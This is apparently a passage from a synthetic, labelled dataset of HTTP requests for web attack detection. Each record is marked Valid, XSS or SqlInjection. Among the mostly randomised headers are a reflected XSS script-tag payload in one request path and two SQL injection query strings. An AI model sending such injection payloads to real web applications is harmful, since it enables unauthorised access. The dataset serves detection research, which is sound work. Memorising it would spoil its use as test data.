Warning: 750 www.Semo.html:72929 "jrrA0ies6s28ioso" 
X-Forwarded-For: 118.127.121.36
X-Serial-Number: 9696710
----: -----------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 49625
Start - Id: 46501
class: XSS
GET /<SCRIPT>alert(document>URL)</SCRIPT>/? HTTP/1.0
Host: 119.138.49.245
Connection: loeao
Accept: audio/*;q=0.8
Accept-Charset: utf-7;q=0.8, big5, x-mac-greek, us-ascii
Accept-Encoding: *
Accept-Language: doh-efbp6r
Cache-Control: no-store
Client-ip: 219.134.80.54
Cookie: u8nNria0srtowa=7rl5@
Cookie2: $Version="7"
Date: Mon, 31 Oct 05 11:03:09 CET
ETag: W/"4Q2Q8kPVSy5KUOAmh"
Expect: ninwdknn
From: piteR@trksge.gov
If-Modified-Since: Thu, 26 Oct 06 04:35:25 GMT
If-Unmodified-Since: Fri, 02 Jun 06 20:43:40 GMT
If-Match: "KPmeNLCf4rJ1x8-U8T8"
If-None-Match: *
If-Range: "-j9OI@AIkxXhBo86PRq"
Max-Forwards: 2521
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: Basic aXp4czE6c2xhag==
Range: 8-112855,2026-165541
Referer: /oS0cvb/tlrwfmen.jsp
TE: trailers,trailers
Trailer: Date
User-Agent: Mozilla/0.4 (compatible; MSIE 9.5; Unix; qrtahno; 8lyegotIf)
UA-CPU: x86
UA-Disp: 0683,5714,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 139x000
Via: 7.7 100.228.143.166
Transfer-Encoding: identity
Upgrade: lNa/8.0, nnchdy/2.1, q9de/3.4, se9N7o/1.4
Warning: 000 30.27.133.227 "nEecyFef" 
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46501
Start - Id: 12354
class: Valid
GET /eW0aqG7aA/w_4K@dap8f8kJ1NjJa_/rf5/5E/evaUG/K_zW/uDG0FC0IScMdh/ogwinntbadT/XN-Pbody/7gk38NKz/iVz6ZH2lxA0FPKW4k/cIoHI.bin?PoyysLiIo9Oto=tl5&yrtssntnPaiR9a=3&t3aXbbsne=ne0a&rcptPV0=7234741&les=aiee9h4ismaIaroyet&tiedg=i%29form3a&gneecoer=vou-%7EsmrAb4efg4&1F8RQ=4487 HTTP/1.0
Host: 146.122.15.63
Connection: iShs
Accept: video/quicktime, audio/*;q=0.8, application/*
Accept-Charset: iso-8859-1;q=0.8, iso-8859-4;q=0.7, utf-7, windows-1251;q=0.8
Accept-Encoding: *
Accept-Language: pskio-n1eeieoa
Cache-Control: o=RTd
Client-ip: 131.209.1.227
Cookie: I@2bK=tah;lzLRN2og=15509515
Cookie2: $Version="47"
Date: Mon, 02 Apr 07 04:50:36 UTC
ETag: "KS6nBm0Jo@9PcrcqaYv"
Expect: tusritdu
From: huuAfxy@eyooxthv.fr
If-Modified-Since: Thu, 25 May 06 23:00:51 GMT
If-Unmodified-Since: Tue, 09 Aug 05 21:06:03 CET
If-Match: "9XJzYLnBVOdzlKX"
If-None-Match: *
If-Range: "9M-CpTiJSt@cZAByTV"
Max-Forwards: 98
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: Basic aW5uZWtjaTpibnN0dTU=
Authorization: NTLM YXNib2phdG5pdGhhZXNjc3B1ZXRmcHRubmN0ZUloU2Vnazd4c2xlZU9FOXRuZQ==
Range: 662-4,8147-,483669-546
Referer: /Gseq04rl/wilIs/einhha/xj8d/g6aa8.shtml
TE: gzip;q=0.6,deflate;q=0.2,trailers
Trailer: User-Agent
User-Agent: i9xcAkg- http://www.aBeaY.com
UA-CPU: Sparc
UA-Disp: 3711,172,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 8258x863
Via: 7.3 122.237.66.114, 0.8 34.68.26.207:5298, 4.5 www.Nersnvtv.png
Transfer-Encoding: gzip
Upgrade: oE2te/7.8, Hstma/8.3, oi5ia/6.9, iXetpi/8.4
Warning: 258 141.130.237.37 "ioreaseroE" "Tue, 27 Sep 05 18:21:28 UTC"
X-Forwarded-For: 202.158.102.83
X-Serial-Number: 250138591797251529
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12354
Start - Id: 25230
class: Valid
GET /dwi4mINm5Nyyze.mdb?ssa7tiatiDsDlce=beopoofnarkwthem HTTP/1.1
Host: www.vyslacoh.org
Connection: close
Accept: audio/basic
Accept-Charset: *;q=0.9
Accept-Encoding: gzip
Accept-Language: *
Cache-Control: max-stale
Client-ip: 188.84.7.22
Cookie: Eeur=sIueserfnt;eotvciasez8ei=maa;imhn6ayqTr=oxIAB;Ytnc6m9btm=5f;sI5oahan=mzR_4Mry2AGM
Cookie2: $Version="4"
Date: Mon, 26 Dec 05 20:49:45 GMT
ETag: W/"sxmcNfC6rjC_uor1m3"
Expect: eiosno=nueddSn
From: k4NgNry@tf92Cos.be
If-Modified-Since: Fri, 04 Jun 04 14:29:30 UTC
If-Unmodified-Since: Sat, 15 Dec 07 23:03:20 CET
If-Match: *
If-None-Match: *
If-Range: "D8JB_8nxgY3XDDznLUzZ"
Max-Forwards: 1603
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: Digest qop=auth-int
Range: 0953-9712,14819-971,55-
Referer: /L6solT/aaaioalw/Ha12tt/xirnea/n8ajf.tiff
TE: trailers,trailers,trailers
Trailer: From
User-Agent: hnaIudlig9
UA-CPU: PowerPC
UA-Disp: 468,067,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 765x9448
Via: aqeisE/6.7 224.216.230.219
Transfer-Encoding: identity
Upgrade: 4DTm/7.9, 4nd/2.1, blaaL/7.8, bsr8r4/1.2
Warning: 490 www.n7rtrte.htm "6nrmt" 
X-Forwarded-For: 128.219.12.193
X-Serial-Number: 39906730696975900354
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25230
Start - Id: 41792
class: SqlInjection
GET /pxEnetcattmpKOC/uJ02iE@eH.cgi?ewnsoo8Fwea=%27UNIONALLSELECTfieldFROMrasiretrritoWHERE%27%27++++%3D++++%27&bfiSsea24=k%3Eo&same=obL-Q HTTP/1.1
Host: 249.235.141.227
Connection: swuueAI
Accept: */*;q=0.8
Accept-Charset: euc-jp, x-mac-chinesetrad, x-mac-roman, iso-2022-jp;q=0.2, macintosh;q=0.8
Accept-Encoding: 
Accept-Language: th2mx-opclel, phtr1-s, n6ihclhb-c2ue, rarld-bYodT9, Rtar-mer
Cache-Control: no-cache
Client-ip: 218.44.126.244
Cookie: ensstiaav=af8NUYejY8;qroeti=onNON-I;dn=n eLioNdohe4p;zNt=giyh@G@Bvk;7hs=Smrc;
Cookie2: $Version="3"
Date: Tue, 07 Mar 06 03:29:28 GMT
ETag: W/"ZXEXElr@0LpV3YJGdbm"
Expect: onotkol
From: nIeior@tiriRlyas.net
If-Modified-Since: Sat, 22 Oct 05 13:49:13 CET
If-Unmodified-Since: Tue, 30 Jan 07 01:15:39 CET
If-Match: *
If-None-Match: "ULyeBhS_17z3tmEq1"
If-Range: *
Max-Forwards: 41
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: bn6u eNiil=ettssimU
Authorization: nkoe63 beoeYB=Norx
Range: 82059-
Referer: /3nve.tar.gz
TE: gzip,trailers,deflate;q=0.4
Trailer: User-Agent
User-Agent: Mozilla/5.6 (compatible; sh4t; Windows NT; 7oemoron1; tfti)
UA-CPU: x86
UA-Disp: 885,1136,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 832x0332
Via: FTP/8.6 46.11.234.136, FTP/4.2 www.al5aNwo.js:35, 0.1 114.78.57.184
Transfer-Encoding: gzip
Upgrade: ooo/9.2, 8pcmnn/1.5
Warning: 426 159.202.208.161 "deuobinrttskRs" 
X-Forwarded-For: 234.161.201.75
X-Serial-Number: 17122995024045170296
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41792
Start - Id: 29894
class: Valid
GET /sLfcYnNfA9fnedVxjs/2b-x@azccPMkh/bWd-nqSEAt@s34yqt_o/hF3f6uethOfd/PXghNperlepEuQ/hUANclw/n0Echnuhrf9rNhh/.xhtacces/o1Y8IuuIIMi/.OSFHK@P/iZvTHRalQFtjnh/rodhhofareirnne.gif?Qv-ZeCdelete8Q=ntSqrkerral&Xhs8-ou0z2=68718420&7vnr=oroso&ATsz=900&ateoeoeerG=%3Daeeiq0dy&wis5eeosp=+s%25&Wt=e9hoostaE&T8mochaljm8@vK2=203&K-_Azy4kk=e0tebaeettmethi&esheaarnse1e=eWy7E&mqtmpXbAfm=1nts&etd8nY=069476&I.J4YertmpIle=eefrL&dlKnmuotcbtlNi=338734709 HTTP/1.0
Host: 172.236.205.246
Connection: Rbsbts
Accept: video/mpeg
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=4223
Client-ip: 234.119.129.118
Cookie: ou1aql9sos=1n 
Cookie2: $Version="8"
Date: Thu, 11 Feb 10 02:35:35 CET
ETag: W/"TfIOlc_t7kmM9j_MpD-"
Expect: AbexcEll=Tbddt
From: seohnbi@tEydRnkio.be
If-Modified-Since: Mon, 29 Aug 05 06:24:44 UTC
If-Unmodified-Since: Sat, 21 Aug 04 09:54:29 GMT
If-Match: *
If-None-Match: "RjzwZhwA@3pQQK1QfA"
If-Range: Sat, 31 Oct 09 05:10:33 GMT
Max-Forwards: 37
MIME-Version: 3.0
Pragma: Islrc='alnalmeT'
Proxy-Authorization: meaud m7h0u=nztdpF
Authorization: Basic Y3VmamFydHI6aGN1aWh0
Range: 7-5389
Referer: http://www.an64.gov/sdsviis/etsgds/hipy3t/h70nn6.asmx
TE: trailers,chunked,trailers
Trailer: Accept-Language
User-Agent: Mozilla/5.3 (Windows; U; WinNT 3.1; Rh-lg; rv:7.9.0) Gecko/97771504
UA-CPU: Sparc
UA-Disp: 754,5719,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 3101x221
Via: 4.0 175.89.203.197, FTP/6.3 www.eOisrd4.png, 1.0 148.93.62.91
Transfer-Encoding: identity
Upgrade: rens/6.9
Warning: 213 www.chsq.js "nlm16isgerEe" "Sat, 10 Oct 09 10:33:19 CET"
X-Forwarded-For: 255.72.182.148
X-Serial-Number: 615013754882533
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29894
Start - Id: 25817
class: Valid
GET /uf/2dr6URkQ/Eua/lhin8ft6ieimsSe/aLNYJ.jpeg?67VbX8A3b=Otmpuh%3E-o&8imtde0ehRa=swhrT%2Bei&FX.Jc=nwd&kr=pstfd HTTP/1.0
Host: 248.5.223.162
Connection: close
Accept: audio/*;q=0.9, application/rtf, video/*;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: vro-eeios, a-f3eooHet;q=0.1
Cache-Control: max-age=7
Client-ip: 116.57.233.212
Cookie: csegrhsIclhw=211;3Ag.m-e=cdj4fDoU;tformYKnullbkMphpodps=olvoelcoc%40%3Ceyit;objectsock_streamvarv2=allHbonph-;94xmE%uks=%25
Cookie2: $Version="869"
Date: Mon, 14 Dec 09 16:55:33 UTC
ETag: "c8vmHwXWZ7uyG@8P"
Expect: utdaet=nsn7mee
From: ezNeot@Teed.it
If-Modified-Since: Sat, 14 Apr 07 05:39:52 CET
If-Unmodified-Since: Tue, 21 Jul 09 20:13:32 UTC
If-Match: "lBVoprcJPpmYKK47"
If-None-Match: "q8bo_wR_lj8U8hU_G"
If-Range: Wed, 31 Jan 07 04:07:46 GMT
Max-Forwards: 6840
MIME-Version: 8.5
Pragma: bs8s=hs
Proxy-Authorization: 4yiinm 4kaej3gu=aauohsLs
Authorization: Digest qop=auth
Range: 644-,-02
Referer: /wyrs3sd/qtwrmnr/jenbeh.css
TE: trailers
Trailer: Accept-Charset
User-Agent: Mozilla/4.4 (compatible; MSIE 5.0; Open BSD i386; wdiadtnfr)
UA-CPU: PowerPC
UA-Disp: 733,9248,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 716x600
Via: HTTP/8.9 www.zsos.png, 9.4 47.28.224.160
Transfer-Encoding: gzip
Upgrade: ishmn/5.7, ikeoe/3.7, aoiarj/6.2, ramyin/2.9, ne3gs/9.2
Warning: 886 145.152.248.154 "h6n7sqlaahdlAhre0" 
X-Forwarded-For: 243.205.213.82
X-Serial-Number: 5771791492061
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25817
Start - Id: 19127
class: Valid
GET /g0NGYJvxyR0zLdj/nmeeeoeahEOelEcTaIeT/documentWz_VUkThttp.4passwdT/WvKygdb6TXTP4p/looubsjadsefkike/5lzWXSNH/d8wf0.jsp?ohcNdwsre=08272&yDfutgrHD=eaenIZonuh HTTP/1.1
Host: 235.121.153.139:2
Connection: keep-alive
Accept: text/*, audio/*
Accept-Charset: x-mac-roman;q=0.8, iso-8859-15, windows-1255
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: min-fresh=2
Client-ip: 250.159.224.244
Cookie: 4yvSsIntcn3ih=hto
Cookie2: $Version="13"
Date: Tue, 22 Nov 05 19:39:18 UTC
ETag: W/"HKkidc2U2-J99DY_@P"
Expect: dOejntel
From: eono6e9@e4noq.fr
If-Modified-Since: Sat, 01 Nov 08 06:51:29 GMT
If-Unmodified-Since: Fri, 01 Sep 06 19:53:24 UTC
If-Match: "0qU6LOFUDdgfU-4"
If-None-Match: "P3kbnNKeATeeSW2j83pY"
If-Range: "BLQ8wHuMMVDFt7tI1@"
Max-Forwards: 8029
MIME-Version: 4.0
Pragma: ni1t='a6Fiuw'
Proxy-Authorization: Digest uri=http://rhDeEzl.com/8Sfrs8nS.tiff
Authorization: NTLM YmxsdHNjYXNzZmR0ZHJpYVRhcml0TnRycm9nYW5lYkVucWV3ZXU=
Range: 83457-7
Referer: /ison59/100u0e/oumlst/fhfp13t/ixeeh.exe
TE: trailers
Trailer: Warning
User-Agent: aDdc5t/1.9.1.1
UA-CPU: x86
UA-Disp: 531,060,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 047x447
Via: 8.8 145.64.230.176
Transfer-Encoding: identity
Upgrade: acA9M/5.5, taudh/0.0
Warning: 335 www.ekmeiB.jpg "0lne" "Wed, 30 May 07 03:16:49 UTC"
X-Forwarded-For: 168.136.167.141
X-Serial-Number: 17156015
----: ---------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 19127
Start - Id: 41717
class: SqlInjection
GET /uzLW6/2Z-JH/ydI/Odota/o-eG1aP_1qx/en/ohltTr/qcgmCahsih3dat/yRhteSiHe/mEi/rDwT7tt5IrT8i5saedt.shtml?mnncdnolss=OR+++++%27ert%27+++LIKE+++++%27Sim%25%27&7EQFs-oF-Y=vctdlRehdoeaeae6t&gblcfir5a6f=lehlEfJ+7%5Deueprocessing-instruction&Qxp_b.Bvautoexecp=2Oote&tiAhldu=35274 HTTP/1.1
Host: www.spanrmlgre.gov:05
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: iso-2022-kr;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 60.67.60.69
Cookie: StonatoiU=8160980;tlim=ecmdtes7;oEo4l0=ht;mwn=153531671;eoiaL8ca=ad95mQLzeDnF
Cookie2: $Version="5"
Date: Sat, 17 Feb 07 09:40:30 GMT
ETag: W/"Skmf9ETPm2sCSTzQ"
Expect: 100-continue
From: daatsa@4adiaM.fr
If-Modified-Since: Sun, 14 Oct 07 09:23:51 CET
If-Unmodified-Since: Mon, 15 May 06 09:13:07 UTC
If-Match: *
If-None-Match: "GXrGnNJe9dDO4fka"
If-Range: *
Max-Forwards: 3
MIME-Version: 9.0
Pragma: en=3
Proxy-Authorization: Basic ZWV0bnRuOnZsY2k3Z3Q=
Authorization: gtytt hyuNti=0iath
Range: 018268-
Referer: http://eAresnq.org/oct9rp/fdFftoc/dedP/0yla4/esrt.cgi
TE: trailers,chunked;q=0.8
Trailer: Via
User-Agent: eosie/8.7.3
UA-CPU: Sparc
UA-Disp: 1862,8220,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 431x0868
Via: HTTP/2.3 www.rGwphi.gif
Transfer-Encoding: identity
Upgrade: aah/4.0
Warning: 604 www.Tomsiqie.jpeg "nobubdd9hsyeftiJigo" 
X-Forwarded-For: 152.105.208.9
X-Serial-Number: 611965021882313
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41717
Start - Id: 23388
class: Valid
GET /tsp/tOd3aauho/EorIirnbe4e5a/uSTQnfM.cfm?esiymihofh77=sptauaploati&ualhnpuivhibe=ioo8fs&3rIixgs=+cnt%2BRxaccess_log HTTP/1.1
Host: www.tcEesta.st
Connection: keep-alive
Accept: text/xml;q=0.2
Accept-Charset: isiri-3342;q=0.4, macintosh, euc-tw
Accept-Encoding: 
Accept-Language: iysrtk-naloe;q=0.8, unehJ-aOe, 3u-r, nh2idaRn-7caa, z-teOi
Cache-Control: no-cache
Client-ip: 22.154.61.50
Cookie: esleoutgm=oVn2heVcqr;execorPevalY44=662071;2epEtYtetranin=dNrmtnweoyEeaFrc;jeblhfb3=jGc;ett9=67922507
Cookie2: $Version="4"
Date: Sat, 12 Aug 06 21:46:51 CET
ETag: W/"u0hOJaQV.ZRqffTIUx"
Expect: 100-continue
From: kisol@le4e.uk
If-Modified-Since: Sat, 21 Feb 09 13:42:54 GMT
If-Unmodified-Since: Tue, 14 Jun 05 06:24:42 GMT
If-Match: "1Wc6o9h0Vx5F.CE1hv"
If-None-Match: "qvpXNhSUaUe1_N0"
If-Range: *
Max-Forwards: 304
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: NTLM OWUxWWVhZWdsdG5uaWxyV3EzZW9leHVqb3RFdGNlZXRvT2FDbzBlcg==
Authorization: ahsRs EiyAe=ad9rl
Range: -403,-168018,-671
Referer: http://eiw9Die.cz/9eimhue/yh0tie/iiea/Kb1o/hha3vzg.asmx
TE: trailers,trailers
Trailer: Connection
User-Agent: corch/5.1.9
UA-CPU: PowerPC
UA-Disp: 9336,5495,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 506x4645
Via: HTTP/7.3 130.225.30.174, 2.7 www.ninxs.js, HTTP/1.9 39.92.217.224
Transfer-Encoding: compress
Upgrade: heOl7/5.0, bitr7a/3.7
Warning: 767 www.nutng.jpg "imrettlerf" "Thu, 18 Feb 10 04:49:03 GMT"
X-Forwarded-For: 95.103.231.158
X-Serial-Number: 47626745385
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23388
Start - Id: 3030
class: Valid
GET /shTraqhnuc7j/nTdaedebalpmeset4xby/m_/wTUb/hzbajdntiv07/e7tte/n-Mopl3cqms4z4AINWfD.png?ny=bat+&oin=5&2qrsexr=rs4To&hH.b=nSo HTTP/1.0
Host: www.ak0ceaezsa.st
Connection: se4LOe
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 45.196.69.200
Cookie: ho7tnpeieeweeo=b46cQvrB;eeter9hdeiHre=5cedlaRnpe
Cookie2: $Version="42"
Date: Fri, 22 Jan 10 14:06:44 GMT
ETag: "vACChktZsKtVPeg"
Expect: 100-continue
From: esnlq9T7@ln9ni.be
If-Modified-Since: Fri, 19 Dec 08 03:00:24 UTC
If-Unmodified-Since: Sat, 08 Apr 06 17:15:49 GMT
If-Match: *
If-None-Match: "EYXxnozAoyIJDrynIUv"
If-Range: Mon, 11 Jun 07 18:00:07 GMT
Max-Forwards: 5296
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: aAxi3n wp7nsimi=binuofe
Authorization: NTLM UGV0YXRtV091T2hPYW9zaGxhVWg5ZXJ0dHRlNWhub2k1ZWhKbGpldA==
Range: 37991-,-13
Referer: /prdedr.mdb
TE: trailers
Trailer: Warning
User-Agent: canxartidtheoi
UA-CPU: PowerPC
UA-Disp: 767,9233,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 118x5064
Via: 0.2 www.aiosi.jpg:3, HTTP/5.6 194.188.129.104, 9.9 196.76.81.207
Transfer-Encoding: identity
Upgrade: eyshdo/6.5, d0a/4.9, trpole/3.1, 9iyrb/0.5, o2zegv/7.8
Warning: 788 169.251.130.184 "eeko" 
X-Forwarded-For: 214.228.126.215
X-Serial-Number: 2317803874
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3030
Start - Id: 16265
class: Valid
GET /ihoAso/h0OY-XeXsf7e0Tewq-L/BSshutdown6window.opennokqPI/dd/eXraw@U/nhmI3eao5s/has7vTVFB3syKq_s4.5/hrwhtfl7rbdsswrtn4/t6Q9q/tqyPPu3b.png? HTTP/1.1
Host: www.eo5ier.fr
Connection: Ruukisrh
Accept: video/*, application/postscript, image/jpeg
Accept-Charset: iso-2022-kr;q=0.2, macintosh;q=0.0, x-mac-turkish;q=0.3
Accept-Encoding: gzip;q=0.8, identity;q=0.7
Accept-Language: *
Cache-Control: no-store
Client-ip: 226.116.113.191
Cookie: 6IOOqgroup byQ=47413604;sepeis5hcensne=210509790;niewncsehcnp=eeIj;Ee9bwinntWV=025808
Cookie2: $Version="95"
Date: Thu, 05 Feb 04 09:44:24 CET
ETag: "CXANZw0Rk-KOgM1Jc6X."
Expect: 100-continue
From: 5oSecmlh@N6omaecn.biz
If-Modified-Since: Wed, 13 Feb 08 10:15:12 CET
If-Unmodified-Since: Wed, 28 Jun 06 21:23:40 GMT
If-Match: "6ywM@.IODDCaflNmM"
If-None-Match: *
If-Range: "FhrIhpUUEvBrUAmQ"
Max-Forwards: 381
MIME-Version: 2.6
Pragma: R=riweishs
Proxy-Authorization: nres IismJ=7etN
Authorization: chiiu p5rnnt=nlui
Range: 767-,-23616
Referer: /xdlYci/raeRree/kl8noE8h/a1ae.php4
TE: deflate,trailers,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/3.0 (Windows; U; WinNT 2.8; eo-aI; rv:5.6.9) Gecko/29563301
UA-CPU: 68000
UA-Disp: 7368,0111,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 2602x876
Via: HTTP/5.6 192.146.241.42, 5.0 www.nhrynn.js
Transfer-Encoding: compress
Upgrade: pno/2.0, 92s3t/7.4, hio/3.0
Warning: 593 www.czyane.jpg "hnn6i2Nors" "Sun, 24 Jun 07 01:56:04 GMT"
X-Forwarded-For: 182.148.242.42
X-Serial-Number: 1613720445559
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16265
Start - Id: 30709
class: Valid
GET /6Senshcrge/7S/W02QCNU1cSY/tz6v/ej/eu467n2B7VdPu0Vs/eoe14ynms/6K9wOa6@edPv7TK/rb-m4g.asp? HTTP/1.1
Host: www.eudr.ch
Connection: close
Accept: */*;q=0.9
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: lh-bo
Cache-Control: no-cache
Client-ip: 16.105.179.92
Cookie: iolh=rRf;hazswassId=r/aa2xor;vKiHII= uiab;lhsdo=dsdiacceptno
Cookie2: $Version="1"
Date: Tue, 28 Mar 06 15:24:54 UTC
ETag: W/"eWah_UTV5t-eQLr"
Expect: 100-continue
From: dubt@tmrdi.net
If-Modified-Since: Thu, 13 Aug 09 04:17:29 GMT
If-Unmodified-Since: Wed, 23 Nov 05 02:07:01 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 26 Mar 06 10:03:12 GMT
Max-Forwards: 9
MIME-Version: 7.4
Pragma: f6baqs=azen
Proxy-Authorization: NTLM b2pjcm5taHNpZXNlZTM2aXRzaGlubG9Obm9lMG5laGdvdGlu
Authorization: Digest opaque="hhaX"
Range: 17470-
Referer: /pUitol/atntn/gtfd6p.swf
TE: trailers,deflate
Trailer: Accept-Charset
User-Agent: Mozilla/9.0 (Machintosh; U; PPC 1.0; ih-1s; rv:5.9.5) Gecko/01067263
UA-CPU: 68000
UA-Disp: 802,001,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 2445x5903
Via: 7.5 6.102.189.182, 4.2 42.147.79.13
Transfer-Encoding: deflate
Upgrade: Fit/6.5, aensa/6.6
Warning: 028 44.212.149.214:667 "lxogstinibrueodc" "Fri, 09 Apr 04 15:35:57 CET"
X-Forwarded-For: 78.5.245.10
X-Serial-Number: 925559378
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30709
Start - Id: 34543
class: Valid
POST /eZkI4Qb_Pl/hk.cfm? HTTP/1.1
Content-Length: 196
Content-Language: cct2yetp,nj0Seir
Content-Encoding: identity
Content-Location: http://rN4aee.de/etii/tmtedaM.swf
Content-MD5: Z3MwbmZhVXNpdDl6bmVyQQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 07 Jan 04 08:14:30 UTC
Last-Modified: Wed, 21 Jun 06 15:21:02 GMT
Host: 230.221.83.171:80
Connection: socatmns
Accept: audio/basic, text/*, text/plain
Accept-Charset: iso-2022-kr;q=0.9
Accept-Encoding: *;q=0.7
Accept-Language: htbuU-i5rss, tn-mreiie, elnatr2e-di;q=0.1
Cache-Control: u='e'
Client-ip: 1.0.24.214
Cookie: sO4Tre=6l+i'winnt;lwevgn2d=itl84ofeoe9bNiihhU;uwO18jhtaccesV=3ten;sclv=a;f0etfdoew4Soo=&/
Cookie2: $Version="195"
Date: Sat, 25 Oct 08 18:53:51 GMT
ETag: W/"u9K39VgymBaLo2IhfH2"
Expect: yiqyob
From: aiiTbdt@stretps.it
If-Modified-Since: Thu, 04 Feb 10 20:58:28 UTC
If-Unmodified-Since: Thu, 06 May 04 09:28:15 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 04 Aug 06 08:50:13 CET
Max-Forwards: 0256
MIME-Version: 0.1
Pragma: jd='7'
Proxy-Authorization: NTLM bGNobmljaGtpdFJ4a0tDY2hsbmxGaHI1dG15ZWVjbm9hdHNjbw==
Authorization: Digest cnonce="eaoj"
Range: 700959-,22-,44069-
Referer: /oEh9rs5/iylteb.nsf
TE: chunked;q=0.9
Trailer: Via
User-Agent: Mozilla/2.4 (X11; U; Open BSD i386 6.0; mi-at; rv:1.9.4) Gecko/98989476
UA-CPU: MIPS
UA-Disp: 225,732,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 066x785
Via: 5.7 www.4oeerfTo.css, HTTP/0.7 160.36.158.163:88347
Transfer-Encoding: deflate
Upgrade: orle/9.9, 2isa/7.7, orI9ai/1.5, ipa/0.5, hmizf/2.7
Warning: 065 65.77.102.167 "nhro5a2" 
X-Forwarded-For: 46.232.250.126
X-Serial-Number: 52771929
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~

trty1noodioBc=rtn &intciihthctt=4027&l.2Uposition=53&or0dsl=hiunfhsnaco&Iox=ibody&etureal71eturhe=450205&fiarnsietnfs=moehtaccespap 4ie&NCY6Zr4K1insertg=pxodl&ebeelw7ai=iRnteeyt5&3sEaasuaso=771280

End - Id: 34543
Start - Id: 21072
class: Valid
GET /vdozLhsYLMu/QNg6t2YhODQopen/s4erj6YXmCY/wd8gO5Gela76zJrF2/afo1zhinezdeSe5aeo/E-51Bn/fhldjaeeNsrs2o.dll? HTTP/1.0
Host: 6.1.231.57
Connection: keep-alive
Accept: text/*;q=0.1, video/*;q=0.1, image/png
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 243.66.44.11
Cookie: v3j=wTKYC;IevilosaEZaaPt3=in)jhcItTaPctatena
Cookie2: $Version="56"
Date: Mon, 25 May 09 22:50:34 UTC
ETag: W/"ipwRsw15MI416@osrnl"
Expect: 100-continue
From: TcuGd@oto9w.com
If-Modified-Since: Mon, 03 Jan 05 03:51:17 UTC
If-Unmodified-Since: Mon, 20 Jul 09 14:59:07 GMT
If-Match: "simLQSIHtvc6Vfh"
If-None-Match: *
If-Range: *
Max-Forwards: 79
MIME-Version: 9.2
Pragma: cie=i0
Proxy-Authorization: Digest algorithm=MD5
Authorization: NTLM YXIwdGNhdnRlZWlsb29kbTF2ZUh6cmFlcGVPaXJpc2VhMjFod0k=
Range: 966923-49277,-9,672714-
Referer: http://www.dtew.cz/ea5eedL1/rsedwa2/AgsnOoj/72eab/suethI.txt
TE: trailers,chunked;q=0.9
Trailer: TE
User-Agent: sX1K_5- http://www.cjho1opa.biz
UA-CPU: 68000
UA-Disp: 708,2630,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 523x776
Via: 3.8 213.114.43.230, jsh8in/0.6 www.daK0f8.png
Transfer-Encoding: deflate
Upgrade: 7ynff/7.0
Warning: 713 12.247.43.52:5198 "etwniheaEussemp7n" "Tue, 07 Sep 04 10:12:42 UTC"
X-Forwarded-For: 204.19.242.253
X-Serial-Number: 650978480578430420
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21072
Start - Id: 24405
class: Valid
